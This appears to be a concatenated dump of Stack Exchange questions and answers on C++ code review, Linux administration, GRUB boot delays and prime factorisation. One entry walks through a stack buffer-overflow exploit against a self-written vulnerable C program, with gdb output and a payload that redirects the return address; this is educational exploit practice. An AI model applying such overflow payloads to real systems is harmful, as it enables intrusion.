    elevent2ninteen.push_back("Nineteen");

    //TwoDigit
    twoDigit.push_back("Ten");
    twoDigit.push_back("Twenty");
    twoDigit.push_back("Thirty");
    twoDigit.push_back("Forty");
    twoDigit.push_back("Fifty");
    twoDigit.push_back("Sixty");
    twoDigit.push_back("Seventy");
    twoDigit.push_back("Eighty");
    twoDigit.push_back("Ninety");

    //threeDigit
    threeDigit.push_back("Hundred");
}

void numbertoword::display(int digit)
{
    if( originalNumber < 10)
    {
        std::cout << one2nine[digit] << " ";
    }
    else if( originalNumber < 20)
    {
        std::cout << elevent2ninteen[digit - 1] << " ";
    }
    else if( originalNumber < 100)
    {
        std::cout << twoDigit[digit - 1] << " ";
    }
    else if( originalNumber < 1000)
    {
        std::cout << one2nine[digit] << " " << threeDigit[0] << " ";
    }
}

void numbertoword::calculate(int number, int count)
{
    if( number < 10)
    {
        display(number);
        return;
    }
    xN = number / count;
    yN = number - (xN * count);
    if( number < 20 && number != 10)
    {
        display(yN);
        return;
    }
    else if(number < 100 && yN == 0)
    {
        display(xN);
        return;
    }
    else if(number < 100)
    {
        display(xN);
    }
    else if(number < 1000 && yN == 0)
    {
        display(xN);
        return;
    }
    else if(number < 1000)
    {
        display(xN);
    }
    originalNumber = yN;
    count = countNumber(originalNumber);
    calculate(yN, count);
}

int numbertoword::countNumber(int number)
{
    int c = 1;
    while( number > 9)
    {
        number = number / 10;
        c *= 10;
    }
    return c;
}

void numbertoword::convert(int number)
{
    initialize();
    originalNumber = number;
    int c = countNumber(number);
    calculate(number, c);
}

int main()
{
    numbertoword n2w;
    n2w.convert(999);
    std::cin.get();
    return 0;
} | Convert number into words | c++;c++11;converting;numbers to words | numberToWord.h
Consider renaming numbertoword to NumberToWord. This uses a naming convention referred to as PascalCase, which is different from your variables and functions. Also notice that the compound words have been emphasized; this makes it easier for others to read the full name.
Since you're not using your own destructor, you can just leave it out. The compiler will provide one for you that should be suitable.
These names make no sense to me:
int xN, yN;
Unless these shortened names are obvious in the program, they should be spelled out entirely so that others can understand them. It may also benefit you in case you ever forget what they mean.
Source.cpp
Elaborating on what @vnp has mentioned about initializer lists, you can use one in place of the multiple calls to push_back():
one2nine { "one", "two", "three" /* ... */ };
Moreover, consider renaming the vector to oneToNine, which is a less awkward name. Apply this to the other similar names as well.
Better yet (regarding the use of vectors), you can use std::array instead. It would be better suited for this task as you're not needing a dynamic data structure here.
This can be simplified:
number = number / 10;
by using the /= operator:
number /= 10;
With the existing curly braces, these should be on separate lines:
display(number);
return;
You should be doing input validation with this. If the user inputs a non-numerical value or a value below 0 or above 999, the program should display an appropriate error message and then terminate.
This program can be made more usable by accepting command line arguments:
int main(int argc, char* argv[])
{
    int number;

    // the file name is considered an argument
    if (argc > 1)
    {
        number = std::atoi(argv[1]);
    }
    // only file name given
    else if (argc == 1)
    {
        std::cin >> number;
    }

    // ...
}
(std::atoi() requires <cstdlib>)
It would make more sense to construct numbertoword objects with the original number, rather than passing it to convert(). The function has no business doing that, and this initialization should only be done by the constructor. The function should also no longer take arguments.
numbertoword n2w(999);
n2w.convert();
In order for this to work, you should replace the default initializer list with one that takes an argument:
numbertoword::numbertoword(int originalNumber)
    : xN(0)
    , yN(0)
    , originalNumber(originalNumber)
{
}
(I've rearranged the list so that it's easier to maintain the data members.)
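To make the review's structural suggestions concrete, here is a compact reference implementation of the same 0–999 conversion, written in Python for brevity (the lowercase wording, e.g. "forty" rather than the original's "Forty", is a stylistic assumption of mine):

```python
ONES = ["zero", "one", "two", "three", "four", "five", "six", "seven",
        "eight", "nine", "ten", "eleven", "twelve", "thirteen", "fourteen",
        "fifteen", "sixteen", "seventeen", "eighteen", "nineteen"]
TENS = ["", "", "twenty", "thirty", "forty", "fifty",
        "sixty", "seventy", "eighty", "ninety"]

def number_to_words(n):
    """Spell out 0 <= n <= 999 in English words."""
    if not 0 <= n <= 999:
        raise ValueError("only 0-999 supported")
    if n < 20:
        return ONES[n]
    if n < 100:
        tail = "" if n % 10 == 0 else " " + ONES[n % 10]
        return TENS[n // 10] + tail
    head = ONES[n // 100] + " hundred"
    return head if n % 100 == 0 else head + " " + number_to_words(n % 100)

print(number_to_words(999))  # nine hundred ninety nine
```

Note how lookup tables (the analogue of the review's std::array suggestion) replace the run-time push_back() initialization, and the single recursive call mirrors the calculate() structure without the mutable xN/yN state.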
_unix.303280 | I installed Ubuntu 16.04 on an ASUS Z450LA laptop that has Intel HD5500 integrated graphics.
The brightness up/down keys (Fn+F5/F6) don't work; however, if I use my desktop environment to control the brightness, it works. Still, it is annoying not to have the easy way to control brightness.
When I use xev, it shows that these keys are not generating events; it's as if the system doesn't detect them at all. What to do?
The content of /sys/class/backlight:
/sys/class/backlight$ ls
intel_backlight
and the intel_backlight directory contains:
actual_brightness
bl_power
brightness
device -> ../../card0-eDP-1
max_brightness
power
subsystem -> ../../../../../../../class/backlight
type
uevent | Brightness up/down keys don't work | ubuntu;laptop;brightness | null |
_unix.304073 | Since the specific limits at which the file system fails depend on the OS, we have a test that validates just that we can get up to 500 entries on an ACL, and that 4000 entries fails (it should fail on all UNIX platforms at that level). This test has been working for a long time on different architectures and OS versions.
Recently I ran the test on:
cat /etc/os-release
NAME=SLES
VERSION=12-SP1
VERSION_ID=12.1
PRETTY_NAME=SUSE Linux Enterprise Server 12 SP1
ID=sles
ANSI_COLOR=0;32
CPE_NAME=cpe:/o:suse:sles:12:sp1
with filesystem type:
cat /etc/fstab
UUID=61e7-43bb-8cdc-80a3718e27b9 / xfs defaults 1 1
It passes and is able to set an ACL with up to 4000 entries without complaining, so I wanted to know whether the OS allows this file system to have this many ACL entries, and what the limit is. | Limit of ACL on x86 sles12 file system type xfs | acl;sles;x86;xfs | Xfs had a limit of 25 ACL entries for a long time but the limit was lifted in kernel 3.11. For xfs v5 or later, the limit is now as many as fit in the extended attribute list (64kB), which at 12 bytes per entry means 5460 entries if there are no other extended attributes (e.g. no SELinux context). I think some Linux filesystems can compress most ACL entries down to 4 bytes, which would allow a little under 16384 entries. I don't understand why you'd test that there is a maximum number of ACL entries. This is not something you can count on. At any time the number could become effectively unlimited.
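Back-of-the-envelope arithmetic behind the figures in the answer (the 12- and 4-byte entry sizes and the 64 kB budget come from the answer; the quoted 5460 presumably leaves a few bytes of the attribute list for overhead):

```python
ATTR_BYTES = 64 * 1024  # xfs extended-attribute budget cited in the answer

entries_xfs = ATTR_BYTES // 12    # 12 bytes per ACL entry
entries_packed = ATTR_BYTES // 4  # 4 bytes per entry on some filesystems

print(entries_xfs)     # 5461 -- the answer quotes "5460 entries"
print(entries_packed)  # 16384 -- matches "a little under 16384 entries"
```

Either way, both figures are orders of magnitude above the 4000-entry threshold the test assumes will fail.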
_webmaster.25741 | I have a question. Let's say I have <input type=file name=image />. Will the text of the button change if the user has a different language as his system default one? If so, then how can I force this button to use English by default? | Is the input type=file default language the system language? | html;browsers;language;operating system | The only way to change this is by replacing the button (e.g. with SWFUpload), but I don't see why you would want to. You shouldn't change the user's system language. They've chosen their system language for a reason, and there's an expectation that their UI will be rendered in this language that they can read/understand.
_unix.346060 | I'm a newbie with networking, working on OSX and a little bit meticulous... for instance:
I simply open an http server from my terminal (with node) listening on port 3000, which is obviously working if I request localhost:3000 in a browser. Now, I want to see this connection, so I use netstat. I'm supposed to see the server connection on port 3000, and the client connection on another port:
$ netstat -p tcp
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp6       0      0  localhost.hbci         localhost.50215        ESTABLISHED
tcp6       0      0  localhost.50215        localhost.hbci         ESTABLISHED
tcp6       0      0  localhost.hbci         localhost.50214        ESTABLISHED
tcp6       0      0  localhost.50214        localhost.hbci         ESTABLISHED
tcp6       0      0  localhost.hbci         localhost.50213        ESTABLISHED
tcp6       0      0  localhost.50213        localhost.hbci         ESTABLISHED
tcp6       0      0  localhost.hbci         localhost.50211        ESTABLISHED
tcp6       0      0  localhost.hbci         localhost.50212        ESTABLISHED
tcp6       0      0  localhost.50212        localhost.hbci         ESTABLISHED
tcp6       0      0  localhost.50211        localhost.hbci         ESTABLISHED
tcp6       0      0  localhost.hbci         localhost.50210        ESTABLISHED
tcp6       0      0  localhost.50210        localhost.hbci         ESTABLISHED
There are no entries about the server connection on port 3000. But localhost.hbci, switching between the local and the foreign address, seems to be my server connection. And if I type:
$ lsof -i TCP:3000
COMMAND  PID        USER  FD   TYPE             DEVICE SIZE/OFF NODE NAME
node    1144 garysounigo 11u   IPv6 0x6d9a12e1e288efc7      0t0  TCP *:hbci (LISTEN)
I'm sure that hbci represents my port 3000. Does anyone know what hbci means or refers to? Is it a port for a local server? A protocol for a local connection? I find all sorts of things everywhere (on any port.. ;) ) | TCP *:hbci (LISTEN) - What does hbci mean? | linux;tcp;netstat | Does anyone know what hbci means or refers to? HBCI stands for Home Banking Computer Interface, see http://openhbci.sourceforge.net/.
The same port number is also used by the RemoteWare Client, at least according to http://www.networksorcery.com/enp/protocol/ip/ports03000.htm.The reason you are seeing it is because netstat and similar utilities look up port numbers in a database that maps them to symbolic names (usually, /etc/services).To suppress this behavior in netstat, one can pass the --numeric-ports option, or just -n which also makes some other things numeric. |
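The lookup netstat performs can be illustrated with a toy /etc/services-style table (the single entry below is just an excerpt for illustration; numeric=True plays the role of the -n flag):

```python
SERVICES = {(3000, "tcp"): "hbci"}  # tiny excerpt of an /etc/services-style table

def port_label(port, proto="tcp", numeric=False):
    """Mimic how netstat renders a port: symbolic name unless -n is given."""
    if numeric:
        return str(port)
    return SERVICES.get((port, proto), str(port))

print(port_label(3000))                # hbci
print(port_label(3000, numeric=True))  # 3000
```

The ephemeral client ports (50210–50215 above) have no entry in the table, which is why netstat prints them numerically even without -n.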
_unix.197706 | My team and I will soon begin studying and practicing for the nation-wide Cyber Patriot program. As I'm famed for being our Linux guy, I would really like to improve my knowledge on the subject. Does anyone have any recommendations as to where to start? Generally with an emphasis on securing Linux machines. I have a machine running linux, but I don't know the ins and outs of the OS. | How can I study Linux, in and out? | linux;security | null |
_unix.267933 | I did a dist-upgrade from 4.3.0-kali1-amd64 to 4.4.0-kali1-amd64, but when I restart, the screen gets stuck at 'Loading initial ramdisk ...'. I had to use the advanced boot options to boot with 4.3.0-kali1-amd64 instead.
What can I do to fix the problem? I am running Kali Linux dual-booted with Windows 7. Kali is running on an encrypted LVM. | Cannot boot Kali Linux after dist-upgrade, stuck at 'Loading initial ramdisk ...' | linux;boot;kali linux;initramfs;initrd | null |
_reverseengineering.11020 | I understand the principles of exploiting a classical stack-based buffer-overflow, and now I want to practice it. Therefore I wrote the following test-application:
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void public(char *args) {
    char buff[12];
    memset(buff, 'B', sizeof(buff));
    strcpy(buff, args);
    printf("\nbuff: [%s] (%p)(%d)\n\n", &buff, buff, sizeof(buff));
}

void secret(void) {
    printf("SECRET\n");
    exit(0);
}

int main(int argc, char *argv[]) {
    int uid;
    uid = getuid();

    // Only when the user is root
    if (uid == 0)
        secret();

    if (argc > 1) {
        public(argv[1]);
    } else
        printf("Kein Argument!\n");
}
When the user who starts the program is root, the method secret() is called; otherwise, the method public(...) is called. I am using debian-gnome x64, so I had to compile it specifically for x86 to get x86 assembly (which I know better than x64). I compiled the program with gcc:
gcc ret.c -o ret -m32 -g -fno-stack-protector
Target: I want to call the method secret() without being a root user. {To do that I have to overwrite the Return Instruction Pointer (RIP) with the address of the function secret().}
Vulnerability: The method public(...) copies the program args with the unsafe strcpy() method into the char array buff. So it is possible to overwrite data on the stack when the user starts the program with an arg > 11, where arg should be the length of the string arg.
Required information:
The address of the function secret().
The address of the buffer's first element. Due to ASCII encoding I know that each char has a size of 1 byte, so that the buffer's last element is 12 bytes ahead of the first element.
The address of the RIP, because I have to overwrite it with secret()'s address.
OPTIONAL: It also helps to know the address of the Saved Frame Pointer (SFP).
Methodical approach:
Load the program into gdb: gdb -q ret. To get an overview of the full stack-frame of the method public(...) 
I have to set a breakpoint where the function epilogue starts. This is at the enclosing brace } at line 11. Now I have to run the program with a valid arg: run A. At the breakpoint, I now want to view the stack frame.
(gdb) info frame 0
Stack frame at 0xffffd2f0:
 eip = 0x804852d in public (ret.c:11); saved eip = 0x804858c
 called by frame at 0xffffd330
 source language c.
 Arglist at 0xffffd2e8, args: args=0xffffd575 "A"
 Locals at 0xffffd2e8, Previous frame's sp is 0xffffd2f0
 Saved registers:
  ebp at 0xffffd2e8, eip at 0xffffd2ec
From that I can gather the following information:
The RIP is located at 0xffffd2ec and contains the address 0x804858c, which contains the instruction 0x804858c <main+61>: add $0x10,%esp.
The SFP is located at 0xffffd2e8.
Now I need the address where the secret() function starts:
(gdb) print secret
$2 = {void (void)} 0x804852f
Last, but not least, I get the buffer's address:
(gdb) print/x &buff
$4 = 0xffffd2d4
To sum it up:
RIP is at 0xffffd2ec.
SFP is at 0xffffd2e8.
buff is at 0xffffd2d4.
This means that I would have to run the program with 0xffffd2ec - 0xffffd2d4 + 0x04 = 28 bytes (= chars). So, to exploit it, I'd have to run the program with an arg which is 28 bytes long, where the last 4 bytes contain the address of the function secret() (paying attention to little-endian ordering):
(gdb) run `perl -e '{print "A"x24; print "\xec\xd2\xff\xff"; }'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/patrick/Projekte/C/I. Stack_Overflow/ret `perl -e '{print "A"x24; print "\xec\xd2\xff\xff"; }'`
buff: [AAAAAAAAAAAAAAAAAAAAAAAAd2 f f] (0xffffd2b4)(12)
Program received signal SIGSEGV, Segmentation fault.
0x0c3264ec in ?? ()
Two questions arise:
Why is it not working? This example is basically from an older book I'm reading, but theoretically it should work, I think....
Why is there an 8-byte gap between buff and the SFP? What does this memory area contain?
EDIT: That's a download-link to the binary. 
| Writing an exploit for sample-application | c++;gdb;c;exploit;stack | Why is it not working? This example is basically from an older book I'm reading, but theoretically it should work, I think....
It's because you're overwriting the return address on the stack with 0xffffd2ec instead of 0x0804852f (the latter is the address for secret()). If you thus use '{print "A"x24; print "\x2f\x85\x04\x08"; }' instead, it should work.
Why is there an 8-byte gap between buff and the SFP? What does this memory area contain?
That gap is probably because of attempted optimizations made by gcc. The memory area contains nothing (well, technically it contains 8 bytes whose values are indeterminate) and the code in the public() function neither reads from nor writes to that memory area.
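The fix from the answer — 24 filler bytes followed by the little-endian address of secret() — can also be built programmatically instead of hand-writing the escape sequence. A Python sketch using the addresses quoted above:

```python
import struct

SECRET_ADDR = 0x0804852f  # address of secret() from the gdb session above

# 24 bytes of padding to reach the saved return address, then the
# 4-byte target address; "<I" packs an unsigned 32-bit int little-endian
payload = b"A" * 24 + struct.pack("<I", SECRET_ADDR)

print(payload[-4:])  # b'/\x85\x04\x08'
print(len(payload))  # 28
```

Writing payload to a file (or passing it via $(python ...) command substitution) plays the same role as the perl one-liner in the answer.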
_unix.287654 | Problem statement: I want to extract an unknown string (the last string) from a given path name in a single-line command.
Restrictions: The path is dynamic and can change with the user's input. Only the last string is to be extracted, using only one line of command.
Sample:
Eg1: /home/xyz/Desktop/tools
In this case, I need to extract just the word tools.
Eg2: /tmp/my_directory/my_big_dir/my_small/dir/cross
In this again, I need to extract the last string cross.
Is there a way to do this? I tried to use the cut command but it didn't work, as the path length is dynamic. | Extract string from a path | shell script | I think basename is the command you are looking for.
[me@host ~]# basename /home/xyz/Desktop/tools
tools
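When the same extraction comes up inside a script rather than a shell pipeline, it is available without shelling out — for example in Python:

```python
import os.path

# os.path.basename returns the final component of a path
print(os.path.basename("/home/xyz/Desktop/tools"))                          # tools
print(os.path.basename("/tmp/my_directory/my_big_dir/my_small/dir/cross"))  # cross
```

Like the basename command, it handles paths of any depth, which is exactly what the fixed-field cut approach could not do.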
_unix.276467 | I am trying to start my python web.py server at boot, but I am having difficulties getting it running by itself. I have a config-file like the following. It's basically the sample file with an added program. The file lives in /etc/supervisor/conf.d/ and is called supervisord.conf
[unix_http_server]
file=/tmp/supervisor.sock

[supervisord]
logfile=/tmp/supervisord.log
logfile_maxbytes=50MB
logfile_backups=10
loglevel=info
pidfile=/tmp/supervisord.pid
nodaemon=false
minfds=1024
minprocs=200

[rpcinterface:supervisor]
supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface

[supervisorctl]
serverurl=unix:///tmp/supervisor.sock

[program:server]
directory = /home/pi/Server/
command = python server.py
autostart = true
autorestart = true
user = pi
environment=HOME=/home/pi, USER=pi
stdout_logfile = server-stdout.log
stdout_logfile_maxbytes = 10MB
stdout_logfile_backups = 5
stderr_logfile = server-stderr.log
stderr_logfile_maxbytes = 10MB
stderr_logfile_backups = 5
Now when I reboot my Raspberry Pi and open up supervisorctl, I see the error:
error: <class 'socket.error'>, [Errno 111] Connection refused: file: /usr/lib/python2.7/socket.py line: 571
I managed to get it running if I cd into ~/Server where my server.py file is located and also copy the supervisord.conf there, then sudo service supervisor restart and sudo supervisord -c supervisord.conf. Now my server is running like it should... But I need my server to start automatically at boot. I guess it's a problem with being root user vs. not, or something like that... | Start my webpy server using supervisor | python;supervisord | null |
_cs.74407 | I am studying the set cover problem and wondering which real-world problems can be solved with it. I found that IBM used this problem for their anti-virus work, so there should be many others that can be solved by set cover. | What are the real-world applications of the set cover problem? | graphs;graph theory;set cover | null |
_unix.43162 | I have a small custom embedded Linux distribution (created with OpenEmbedded), which boots with GRUB 1.99. The aim is to have it start up fast.
Currently it says:
GRUB loading.
for ~2+ seconds (this is probably unavoidable). Then:
Welcome to GRUB!
under it for a fraction of a second when it has finished loading. (There is no menu or menu timeout.) It clears the screen, then:
Booting 'Disk'
for ~8 seconds. This delay seems like it should be avoidable. I'd very much like to know how to make it not delay here. Then it continues on to:
Decompressing Linux... Parsing ELF... done.
Booting the kernel.
And then lots of fast scrolling text as the kernel boots. The kernel image file is 1.8MB, and the disk image file is 16MB. The grub.cfg file looks like:
set default=0
set timeout=0

menuentry "Disk" {
  set root=(hd0,1)
  linux /boot/Disk.kernel parport=0x378,7,3 ramdisk_size=16384 root=/dev/ram rw
  initrd /boot/Disk.ext2
}
In another boot disk I have (on a Compact Flash card), I have exactly the same kernel and a different disk image file, which is 20MB. The config file is also identical, except that ramdisk_size=20480. This one has an extremely long delay of 69 seconds at that same point. Why is it so much longer? Thankfully, I don't need to use that boot disk often. But it would be nice to fix that one too, since presumably the delay is caused by the same thing.
How do I fix this delay? What is it doing? How does one go about debugging a bootloader? Is it worth looking into a lighter-weight bootloader like SYSLINUX instead? Will deleting some of the unused GRUB 2 modules improve it? (How does one find which modules are unused?)
Summary
All of the following have the exact same Linux 3.2 kernel:
Flash disk A on computer X: 16MB image, GRUB 1.99, boot delay is ~8s; disk A's read speed is 20MB/s.
Flash disk B on computer X: 20MB image, GRUB 1.99, boot delay is 69s; disk B's read speed is 20MB/s.
Flash disk C on computer Y: 16MB image, GRUB 0.97, boot delay is extremely quick; disk C's read speed is 16MB/s.
Note that computer Y is similar to computer X, but a bit slower. (The monitor is not even fast enough to show any GRUB screens at all. From the point of the BIOS screen disappearing to the Linux kernel loading screen first appearing, it shows 4.76s of blank screen - but the Linux kernel has already been loading for at least 1.5s by that time, so it's more like 3.2s at a maximum for GRUB to do its thing. This includes GRUB itself loading and BIOS deciding which drive to boot from, etc.)
Unfortunately, that GRUB 0.97 instance cannot be rebuilt repeatably, so it doesn't seem like a feasible option (although it would be nice).
How do I make GRUB 2 fast?? | Why is GRUB 2 booting so slowly? | boot;grub2;embedded;boot loader | I didn't find the cause of the slow booting with GRUB 2. I ended up using EXTLINUX instead, which is compact and fast, and better suited if you don't need all the fancy GRUB 2 things.
http://www.syslinux.org/wiki/index.php/EXTLINUX
_codereview.51805 | The problem statement can be found here. In short, here's what the problem is about:
You're given a set of numbers and you need to find whether the numbers are ordinary or psycho. For a number to be psycho, the count of its prime factors that occur an even number of times should be greater than the count of prime factors that occur an odd number of times. Else, it's ordinary.
My solution for this is as follows:
First, I initialize the Sieve of Eratosthenes. This is the fastest method I know to get a list of prime numbers.
Next, I loop over all the test cases, and for each number I loop over all its prime factors to increment the even and odd counters, to finally compare them and find the answer. For this I have to loop from 0 to half of the number.
This algorithm of mine is \$O(n)\$ for one input. Since the input size is of the order of \$10^7\$ and the number of inputs of the order of \$10^6\$, my algorithm takes time of the order of \$10^{13}\$. I need help with reducing this time.
#include <cstdio>
using namespace std;

bool primes[5000000];

void erastho()
{
    for (int i = 0; i < 5000000; i++)
    {
        primes[i] = 1;
    }
    primes[0] = 0;
    primes[1] = 0;
    for (int i = 2; i < 3164; i = i + 1)
    {
        if (primes[i])
        {
            int p = i*2;
            while(p < 5000000)
            {
                primes[p] = 0;
                p = p + i;
            }
        }
        else continue;
    }
}

int main()
{
    erastho();
    int t;
    scanf("%d", &t);
    while(t--)
    {
        int n;
        scanf("%d", &n);
        int hal = n/2;
        int v, ev = 0, od = 0;
        for (int i = 2; i <= hal; i++)
        {
            if((primes[i]) && (n%i == 0))
            {
                while (n%i == 0)
                {
                    n = n/i;
                    v++;
                }
                if (v % 2 == 0)
                    ev++;
                else
                    od++;
                v = 0;
            }
        }
        if (ev > od)
        {
            printf("%s \n", "Psycho Number");
        }
        else
        {
            printf("%s \n", "Ordinary Number");
        }
    }
} | Psycho and ordinary numbers | c++;performance;primes;complexity;sieve of eratosthenes | null |
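As a cross-check of the classification rule stated above, here is a hedged reference sketch in Python (my own, with my own sample values; note it factors by trial division only up to √n, so it is O(√n) per query rather than the O(n) the question worries about):

```python
def classify(n):
    """Return "Psycho Number" if prime factors with even multiplicity
    outnumber those with odd multiplicity, else "Ordinary Number"."""
    even = odd = 0
    d = 2
    while d * d <= n:
        if n % d == 0:
            exp = 0
            while n % d == 0:
                n //= d
                exp += 1
            if exp % 2 == 0:
                even += 1
            else:
                odd += 1
        d += 1
    if n > 1:          # a leftover prime factor has multiplicity 1 (odd)
        odd += 1
    return "Psycho Number" if even > odd else "Ordinary Number"

print(classify(36))   # Psycho Number   (36 = 2^2 * 3^2)
print(classify(999))  # Ordinary Number (999 = 3^3 * 37)
```

The key observation is that any prime factor greater than √n can appear at most once, so the loop never needs to reach n/2.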